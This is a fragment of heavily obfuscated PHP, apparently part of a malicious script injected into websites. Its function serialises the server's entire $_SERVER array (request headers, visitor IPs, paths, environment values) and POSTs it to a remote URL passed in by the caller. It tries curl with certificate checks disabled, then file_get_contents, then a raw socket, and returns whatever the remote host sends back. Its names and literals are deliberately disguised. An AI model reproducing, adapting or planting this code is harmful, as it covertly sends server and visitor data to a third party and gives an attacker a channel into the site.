ij($lljl,$ljlijli,$lijjijjiij,$llilijjl,$liljllljiii=-2.3079809663817){$ljjjlj="60";if(in_array("curl",get_loaded_extensions())):if($llilijjl=="yes"):if(strstr($lljl,"\x3f")):$lljl=$lljl."&type=curl";else:$lljl=$lljl."?\x74ype=c\165rl";endif;endif;$liilj=curl_init();curl_setopt($liilj,CURLOPT_URL,$lljl);if(preg_match("#^http\163:/\057#",$lljl)):curl_setopt($liilj,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($liilj,CURLOPT_SSL_VERIFYHOST,false);endif;curl_setopt($liilj,CURLOPT_HEADER,false);curl_setopt($liilj,CURLOPT_RETURNTRANSFER,true);curl_setopt($liilj,CURLOPT_REFERER,"");curl_setopt($liilj,CURLOPT_CONNECTTIMEOUT,"5");curl_setopt($liilj,CURLOPT_TIMEOUT,$ljjjlj);curl_setopt($liilj,CURLOPT_POSTFIELDS,http_build_query($_SERVER));$ljijll=@curl_exec($liilj);curl_close($liilj);elseif(ini_get("al\154ow_\165rl\x5f\146open")==(0765- -0120+-01104)):$lilijlljj=stream_context_create(array("http"=>array("method"=>"\120OST","heade\x72"=>array("Content\055t\x79pe: \141pplication/x-www-f\x6f\x72m-ur\154encoded"),"co\x6etent"=>http_build_query($_SERVER),"ti\155eout"=>$ljjjlj)));if($llilijjl=="yes"):if(strstr($lljl,"?")):$lljl=$lljl."&type=fopen";else:$lljl=$lljl."?\x74ype=fo\160en";endif;endif;$ljijll=@file_get_contents($lljl,false,$lilijlljj);else:if($llilijjl=="yes"):if(strstr($lijjijjiij,"?")):$lijjijjiij=$lijjijjiij."&type=\163ocks";else:$lijjijjiij=$lijjijjiij."?type=so\143k\163";endif;endif;$lijl=fsockopen($ljlijli,056+-0432-0326- -01022,$lilililjjl,$lljlij,$ljjjlj);if($lijl):$ljlijjj=http_build_query($_SERVER);$liliilj="POST ".$lijjijjiij." HTTP/1.0"."\015\x0a";$liliilj.="Host: ".$ljlijli."\x0d\x0a";$liliilj.="Content-Ty\x70e: appl\151cation/x-www-form-urle\x6e\x63o\x64ed"."\x0d\x0a";$liliilj.="\103ont\145nt\055Length: ".strlen($ljlijjj)."\015\x0a\015\x0a";fwrite($lijl,$liliilj);fwrite($lijl,$ljlijjj);$ljiijllijii="";while(!feof($lijl)):$ljiijllijii.=fgets($lijl,06670-07151+010261);endwhile;fclose($lijl);list($llilljlj,$ljllljj)=@preg_split("\057\x5cR\134R\057",$ljiijllijii,0251+-0125-0122);$ljijll=$ljllljj;endif;endif;return$ljijll;};